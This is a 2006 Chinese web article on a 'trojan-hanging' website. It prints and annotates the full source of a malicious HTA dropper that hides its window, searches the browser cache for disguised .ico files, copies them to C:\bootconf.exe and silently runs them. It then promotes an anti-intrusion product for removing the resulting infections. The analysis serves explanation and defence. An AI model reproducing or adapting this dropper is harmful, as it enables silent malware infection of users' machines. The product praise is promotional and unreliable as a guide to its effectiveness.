超强的木马防御软件|-站长天下

首页 ┆ 文章中心 ┆ 下载中心 ┆ 娱乐八卦 ┆ 本站论坛 ┆ 拜仁联盟 ┆ 球迷社区 ┆ 博客日志 ┆ 建站服务 ┆ 域名抢注 ┆ 繁體中文

载入中…

E-mail:WebMaster#fcbu.com

\|	源码下载 \| 工具下载 \| 素材下载 \| 教程下载 \| ASP 源码 \| PHP 源码 \| JSP 源码 \| ASP 教程 \| .NET教程 \| PHP 教程 \| 服务器教程 \|
\|	网络资讯 \| 网站运营 \| 网页制作 \| 数据库 \| 网络编程 \| 图象媒体 \| 操作系统 \| 网络应用 \| 软件教学 \| 火爆影视 \| 五花八门\|
\|	电脑医院 \| 系统攻略 \| 网管技术 \| 电脑硬件 \| 软件天地 \| 网络知识 \| 网页制作 \| 编程讨论 \| 综合问题 \| 职场生涯 \| 数码手机\|

载入中…

当前位置:站长天下 -> 电脑医院 -> 超强的木马防御软件

超强的木马防御软件

作者：TTXS(Fcbu.Com)　　来源：互联网　　发表时间：2006-08-23　　

超强的木马防御软件

篇首语:
　　　虽说“亡羊补牢，为时不晚”，可对于互联网上的安全性而言，却又不是哪么一回事了。试问，当你的系统遭遇了病毒木马入侵，密码被盗、帐号丢失、重要文件被盗、游戏装备被卖等等之后，就算有杀毒软件清除，但损失的是谁呢？受伤的又是谁呢？这一切的一切都需要我们在事先有个准备，事先做好防御。“山雨欲来风满楼”，病毒的来临也是有症状的，就看你的防御系统是否已作好准备。。。
什么是挂马网？
　　　　挂马就是在网站里挂木马，首先是利用漏洞侵入网站后台，然后上传木马，就行了。详细去黑客网站看！（感觉听起来有些废话，将就着理解呗）

（挂马涵义出处）
HTA简介：
　　　　 HTA是HTML Application的缩写（HTML应用程序），是软件开发的新概念，直接将HTML保存成HTA的格式，就是一个独立的应用软件，与VB、C 等程序语言所设计的软件没什么差别。
　　　　这时，也许就有网友要发话了，这与HTA有关系吗？
　　　　顾名思义，挂马网站，既然是网站，而且又挂着大家都很怕怕的木马，那么，它是怎么让我们中招的呢？ IE浏览器。对！就是IE浏览器，人称“常在河边走，哪有不湿鞋”的？对不？而今天要说的这个挂马网就是用到了IE浏览器的Hta漏洞，该漏洞是由HTA应用程序被处理的方式引起。用户可能会被引诱来打开某个恶意文件，一旦打开文件就会导致代码的执行。
　　　　嗯。开始有所了解了吧？那下面就该进入实际的环境中去探讨更多幕后的木马故事。
解读 boot.hta 文件源码
重新整理并注释上，带 // 部分为注释
＜HTML＞
＜BODY onLoad=window.moveTo(5000,5000)＞
＜HEAD＞
＜SCRIPT　　　　　　　　 language=JScript＞
window.moveTo(6000,6000); // 移动窗口的屏幕位置到指定的偏移6000，6000（相对移动）
window.resizeTo(0,0);　　// 改变窗口大小到指定的高度与宽度（相对改变大小）
＜/SCRIPT＞
＜/HEAD＞
＜HTA:APPLICATION ID=j3714 CAPTION=＂no＂ BORDER=＂none＂ HEIGHT=＂0＂ SHOWINTASKBAR=＂no＂　　WIDTH=＂0＂ WINDOWSTATE=＂minimize＂＞　　// 窗口最小化
＜BODY scroll=＂no＂ leftmargin=＂0＂ topmargin=＂0＂ marginwidth=＂0＂ marginheight=＂0＂＞
＜SCRIPT LANGUAGE=＂JavaScript＂＞
function China2008welcome(b){　　
// 嘿嘿嘿。。还 China2008welcome ,挺爱国的，可为什么把马下到自己家里呢？？
try{var　　　　 Break=new Enumerator(Iternater.GetFolder(b).SubFolders);
// 枚举网络相关的文件夹,如Temporary Internet Files之类的网络临时文件夹
for(;!Break.atEnd();Break.moveNext())
{var z0=Break.item().Path ＂\\logo[1>.ico＂;
var z1=Break.item().Path ＂\\logo[2>.ico＂;
//初始化变量, 供下马之用,这里可以看到,网站上应该存在这两个文件:logo[1>.ico ＆ logo[2>.ico
var f=＂C:\\bootconf.exe＂;
// 定义下载后的路径及文件名,这也是为什么很多网友在电脑C盘中发现这几个文件的原因.
if(Iternater.FileExists(z0)){Iternater.CopyFile(z0,f)
// 有这个logo[1>.ico文件吧？那就拷贝到指定的C盘中,并命名为bootconf.exe
w1s2h.Run(f,0,false);v=1;break;}
// 下载后并试图激活这个病毒体
if(Iternater.FileExists(z1)){Iternater.CopyFile(z1,f);w1s2h.Run(f,0,false);v=1;break;}
// 与z0 一样,为了准确下马,预备了另外一只马. 并执行同样的操作...
China2008welcome(Break.item());}}catch(e){}}
function li1k1e1it(){window.close();j=1;}
// 自动关闭自身窗口，就是如图3的那个空白帮助文档窗口
var v=0;
// 开始使用FSO脚本技术了...
try{
var Iternater=new ActiveXObject(＂Scripting.FileSystemObject＂);
var w1s2h=new ActiveXObject(＂WScript.Shell＂);
var cache=w1s2h.RegRead(＂HKCU\\Software\\Micr＂＂osoft\\Windows\\Cu＂＂rr＂＂ent＂＂Ver＂＂si＂＂on\\Ex＂＂pl＂＂orer\\Sh＂＂ell Fol＂＂ders\\Ca＂＂che＂);
// 还原后:
// HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache
// 执行后,读取 cache 值:
//C:\Documents and Settings\icefire\Local Settings\Temporary Internet Files
}catch(e){}
function hatebj(){try{if(v==0){China2008welcome(cache '\\..\\');setTimeout(＂hatebj()＂,4023);}else{opi=1;li1k1e1it();opi=2;}}catch(e){}}
hatebj();＜/SCRIPT＞＜/BODY＞＜/HTML＞
　　　　这个，没看懂？没关系，我也是一知半解的。这些都不重要，重要的是此时，我们“拿什么来拯救我们的爱机？” 其实，这也是我今天要讲的重点中的重点。
　　　　因为，这挂马网不是我的网站，木马也不是我设计的。但是我又是怎么知道我系统中有这只马呢？（不知道是不是千里马？嘿嘿。。。）
　　　　事情是这样的。。。
安全预警响起
　　　　这几天在找些资料，互联网是很诱人的。现在的网站也太多广告之类的啦，都不知道怎么的就被吸引到一个美丽的地方（某个游戏网站）还没来得及欣赏内容，突然弹出一对话框（如图2），起始以为是什么正常的程序做的提示信息，点击确定后，却又弹出一个空白的帮助文档？（如图3）还没来得及奇怪（奇怪帮助文档怎么没有文字内容的？），我的《终截者入侵阻止》中的“安全预警”响起，如图1所示：

图1，安全预警

图2，误以为是正常程序的信息框

图3，空白的帮助文档？
　　　　在“安全预警”中，我发现了这“父进程ID：mshta.exe(3996)”及“文件路径：c:\ bootconf.exe”。而 “安全预警”中的“危险等级”已经接近“最高”。
　　　　这时，凭我的经验，我知道这来者不善。本想在“安全预警”对话框中，选择“记住这个操作”并点击“删除”，仔细一想，先别删除了。万一是正常程序，删错了怎么办？或者也许还可以留个样本。于是点击“禁止”（表示禁止该程序的运行）。
　　　　后来，为了再次难证该程序是否正常的程序，我再次登录这个挂马网，当“安全预警”响起了警告时，我毅然点击了“允许”（佛不渡我，我自成魔）。嘿嘿。。。《终截者入侵阻止》还是忠实地为了拦截了其他下载下来的木马。如下面几个图显示：（有近十来个病毒）
　　

　　　　当发现这种问题时，我们首先要考虑的是如何清除这些木马！并达到更好的预防方式。
岂能容许漏网之“马”
　　　　避免有其他的“漏网之马”，我们可以用 Terminator Lab (终截者入侵阻止实验室)提供的免费工具《安全分析专家》，如下图所示：

发现两个危险等级的程序（这里省略其他的日志内容）
＃O4　　危险　自启动:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\[Empty>>-d:\program files\internet explorer\plugins\system.sys
＃M0　　危险　 DLL:D:\WINDOWS\System32\mshtmlbd.dll
　　　　不知是意外发现还是病毒已经隐藏在我的电脑中了。不管怎样，还是要清除它的。
按照这个目录找到system.sys，删除它。提示无法删除？

因为它已经在某些程序内部了，这时我们是无法删除它的。

安全回归，回归安全
　　　　安全回归？怎么不是97香港回归？这是《终截者入侵阻止》中的另一大亮点，它可以帮助你的系统迅速回归到一种无病毒、无干扰、无流氓软件的安全状态。经其他用户实际用例测试表明，“安全回归”对于一些顽固难清除的病毒、木马、后门有很强的清除功能。文章可以参考：
使用终截者清除灰鸽子2006

使用安全回归对付hxdef后门

　　　　体能瞬间回归安全状态之旅，那我们就来试试它是否能有效对付顽固的病毒木马。GO。GO。GO。

第一步，点击“安全回归”按钮

第二步，点击“运行安全回归”，随后会提醒你系统将要重启
　　　　如果有用《终截者入侵阻止》中的“安全回归”DIY解决这些实际问题的话，会发现其实这个 system.sys 文件感觉并没有被拦截在“安全回归”后听提示框中。我们这时尝试去删除这个 d:\program files\internet explorer\plugins\system.sys ，

　　
　　　　这时，你看，我们可以清楚地看到，此时删除这个病毒，将不费吹灰之力！
安全回归魅力所在
　　　　从“安全分析专家”的日志中，我们看到这样的一条日志：
＃O4　　危险　自启动:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\[Empty>>-d:\program files\internet explorer\plugins\system.sys
　　　　为什么当时我删除它提示我删除成功？而用了“安全回归”后就可以顺利删除呢？
因为用了 “安全回归”之后，《终截者入侵阻止》会禁止启动所有可能危害到系统安全的因素。这就在最大程度上保证了系统安全及达到无干扰、无病毒、高速运行的安全状态。这也是为什么能够在“安全回归”状态下，清除顽固的病毒木马！
　　　　在接下来的几个病毒及木马用例测试中，包括目前最流行的全能QQ大盗、阿啦QQ大盗、传奇木马、魔兽世界黑眼睛等等较强悍的病毒木马；其密码锁保护密码功能在某种意义似乎也用相同之处。不管是在处理病毒木马还是流氓软件上（因为病毒与流氓软件在某种意义上也有其相同之处，比如难清除，恢复能力强）这都给普通用户在清除上带来很多困难。而“安全回归”在某种意义上来讲，已经实现了这一梦想。打造了一个无病毒、无干扰、高速运行的安全状态！
后话：
　　　　由一个挂马网引发的“伯乐识马”。到了最后不免让人深思：现在的网络怎么啦？似乎到处都是一片阴暗？都是哪么的充满陷阱？那么的令人心神不安？谁知道哪一天，打开电脑屏幕就是一片黑暗？不过，　　　　这也正应了那句“千里马常有，而伯乐不常有”啊。此时的你，电脑中是否已经有了这个能识别“万里马，千里马”的伯乐（终截者入侵阻止）了吗？不会吧？沙发？第一次坐！
不过说归说！！所谓的木马之类的我都用怕了！！经常把一些不是病毒或者木马的东西删掉！搞得系统很不稳定最终重装………………
所以现在都不敢装那些木马专杀之类的！！
单单装个诺顿或者卡巴算了！！名字好土,我用AI杀毒软件效果非常好! 木马根本防不住啊

打印本文　

返回顶部　

加入收藏　

广告位招租

上一篇： infostealer病毒求帮忙

下一篇：高手帮忙看看，老是自动弹出网页

关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录
联系方式

联系方式

Copyright © 2004-2007 FCBU.Com All Rights Reserved.
版权所有:『站长天下』新凌讯网络;保留所有权利. 赣ICP备05002812